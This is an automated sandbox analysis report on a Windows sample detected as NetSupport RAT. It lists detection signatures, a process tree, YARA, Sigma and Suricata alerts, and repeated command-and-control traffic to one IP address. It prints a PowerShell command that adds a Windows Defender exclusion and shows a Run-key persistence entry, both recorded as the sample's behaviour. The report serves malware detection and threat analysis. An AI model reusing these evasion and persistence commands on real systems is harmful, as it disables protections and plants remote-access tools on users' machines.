Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BUenB12U2a.exe

Overview

General Information

Sample name:BUenB12U2a.exe
renamed because original name is a hash value
Original sample name:9664f030fe62eaa5700779637bd7538d.exe
Analysis ID:1621635
MD5:9664f030fe62eaa5700779637bd7538d
SHA1:2602684192c5b8371a5cf9ecce6af2bb659b1cfb
SHA256:76198df455918be9c9570ad2199e38b0e8bf4b2ff11b9ed5ab3f0af8f9e3e275
Tags:exeNetSupportuser-abuse_ch
Infos:

Detection

NetSupport RAT
Score:92
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Found pyInstaller with non standard icon
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • BUenB12U2a.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
    • BUenB12U2a.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\BUenB12U2a.exe" MD5: 9664F030FE62EAA5700779637BD7538D)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • client32.exe (PID: 7604 cmdline: C:\Users\user\AppData\Roaming\extracted\client32.exe MD5: C4F1B50E3111D29774F7525039FF7086)
      • powershell.exe (PID: 7540 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 8164 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 8176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • client32.exe (PID: 1376 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 6128 cmdline: "C:\Users\user\AppData\Roaming\extracted\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Roaming\extracted\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Roaming\extracted\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000006.00000002.4178949797.000000006C36D000.00000002.00000001.01000000.0000001B.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000F.00000002.1935755289.0000000000CF2000.00000002.00000001.01000000.00000016.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000010.00000002.2017197752.000000006C7E9000.00000004.00000001.01000000.00000017.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000001.00000003.1798201497.00000210111CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000001.00000003.1797337365.00000210111CB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                      Click to see the 35 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      15.2.client32.exe.cf0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        1.3.BUenB12U2a.exe.2101113a770.1.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          15.2.client32.exe.6c610000.3.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            15.2.client32.exe.6c7c0658.5.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              15.2.client32.exe.6c7c0658.5.raw.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 32 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 7484, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 7540, ProcessName: powershell.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\extracted\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\BUenB12U2a.exe, ProcessId: 7484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client32
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 7484, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 7540, ProcessName: powershell.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\BUenB12U2a.exe", ParentImage: C:\Users\user\Desktop\BUenB12U2a.exe, ParentProcessId: 7484, ParentProcessName: BUenB12U2a.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'", ProcessId: 7540, ProcessName: powershell.exe

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-02-22T02:32:30.868750+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:32:31.110876+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:22.236153+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:34.157845+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:37.986062+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.064124+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.174195+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.282926+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.392226+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.501709+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.610998+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.720439+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.829737+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:40.939239+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.048612+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.157974+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.267272+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.376627+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.485998+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.596467+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.712462+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.814177+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:41.923763+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.032868+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.142271+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.251691+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.361274+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.470689+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.579776+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.689399+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.798494+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:42.907969+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.017295+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.126610+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.236026+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.345489+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.454734+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.564465+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.673629+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.783077+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:43.892245+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.001740+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.111044+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.220472+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.329924+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.439196+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.548766+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.658271+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.767337+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.876735+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:44.986075+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.095539+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.205015+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.314259+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.423567+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.536490+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.642293+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.751735+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.861052+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:45.970679+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.080473+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.189241+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.298626+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.408585+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.520592+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.626821+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.736138+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.845445+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:46.954834+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.064352+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.173671+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.282869+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.392419+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.501684+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.611027+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.720708+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.829828+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:47.939136+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.048574+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.158050+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.267353+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.376631+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.486186+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.595413+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.705071+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.814212+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:48.923701+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.032951+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.142462+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.251685+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.361049+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.470762+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.579806+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.690501+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.799178+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:49.908022+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.018503+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.127125+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.236108+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.346919+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.459188+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.565348+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.677275+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:50.892290+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.001651+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.111019+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.220483+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.329878+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.439265+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.551510+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.659133+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.767277+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.877291+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:51.986461+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.095536+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.206499+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.314153+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.423560+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.534601+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.642357+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.751686+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:52.861099+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:53.189273+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:53.626674+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:53.736047+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:53.848491+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:53.956502+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.066516+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.174809+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.283215+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.392365+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.502939+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.611239+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.720613+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.829811+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:54.939164+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.048529+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.157889+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.267365+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.376705+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.486040+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.596510+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.704874+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.815670+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:55.923824+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.036494+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.143542+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.251661+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.361083+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.470432+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.579775+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.689170+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.798840+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:56.907957+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.017330+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.126662+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.236035+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.345415+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.454818+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.564492+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.673599+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.783249+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:57.894977+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.002848+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.112718+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.222561+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.330722+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:33:58.442613+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
